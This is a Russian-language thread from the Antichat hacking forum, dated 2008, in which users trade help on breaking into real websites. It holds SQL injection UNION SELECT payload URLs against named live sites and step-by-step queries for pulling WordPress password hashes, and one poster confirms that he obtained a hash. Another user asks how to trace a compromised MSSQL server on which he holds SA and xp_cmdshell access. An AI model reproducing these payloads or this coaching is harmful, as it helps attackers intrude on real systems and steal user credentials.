Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.11.2008, 06:08
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Народ вот нашел уязвимость, судя по всему там стоит MSSQL, как дальше добить эту скулю не пойму, так как там нельзя использовать буквы
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+null,null,123+from+information_sche ma.tables--
Первое поле нормально выводится:
http://www.pc.kg/index.php?pageid=2&tg=-1+union+select+table_name,null,null+from+informati on_schema.tables--
можно ли пролезть вот в такую багу сайта?
http://www.hotindex.ru/Details.aspx?id=6927
нельзя, это не баг
|
|
|
21.11.2008, 11:47
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
помогите.. через mysql подобрал таблицы и колонки нашел таблицу wp_users запросом через information_schema в ней через information_schema.columns намел калонку user_pass и user_name вообщем все что нужно для счастья. но при запросе 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+w p_users -- пишет Table 'hoys.wp_users' doesn't exist и ошибки тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?
|
|
|
|
21.11.2008, 14:42
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Ghost0ff Она в другой базе, это 1000000 раз разбиралось, последний раз вчера в этой-же теме
тоесть он не может таблицу найти автоматом приписывает логин свой... в чем проблема? как это обойти?
О_o Какой ещё логин? 
|
|
|
|
21.11.2008, 14:44
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
1) Ищем что такое на самом деле hoys:
+union+select+1,table_schema,3,4,5,6,7,8,9,10,11,1 2,13,14,15+from+information_schema.columns+where+t able_name='wp_users'--
Допустим вывело на экран "forum", тогда твой запрос будет такой:
2) 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15+from+f orum.wp_users --
|
|
|
|
21.11.2008, 14:55
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
1) Ищем что такое на самом деле hoys:
Я тебе без вяких поисков скажу, это база с которой работает скрипт
(только тсссс, это превад инфа)
|
|
|
|
21.11.2008, 16:16
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
О! все выбил хэш. Спасибо большое. +1. впредь глупых вопросов забавать не буду  |
|
|
|
21.11.2008, 16:32
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Есть sql server с правами SA. Через xp_cmdshell телнетится с него куда-либо не могу , но могу пинговать. Как можно внешний ip этого sql сервера пробить. К примеру у меня есть дедик (WIN). Что можно на него заинсталить, чтоб оно отображало кто пингует?  ТОлько простенькое, файр туда ставить не хочется |
|
|
|
21.11.2008, 16:46
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме:
811764
Репутация:
119
|
|
SHS, ставь сниффер
|
|
|
|
21.11.2008, 16:59
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Cain & Abel сойдет? И где там палить эти пакеты. |
|
|
|
21.11.2008, 17:09
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 303
Провел на форуме:
811764
Репутация:
119
|
|
Хз, каина не юзал. Юзал вот это:
http://www.winpcap.org/windump/install/
или
http://www.softportal.com/screenshot-4938-tcpdump-for-windows.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
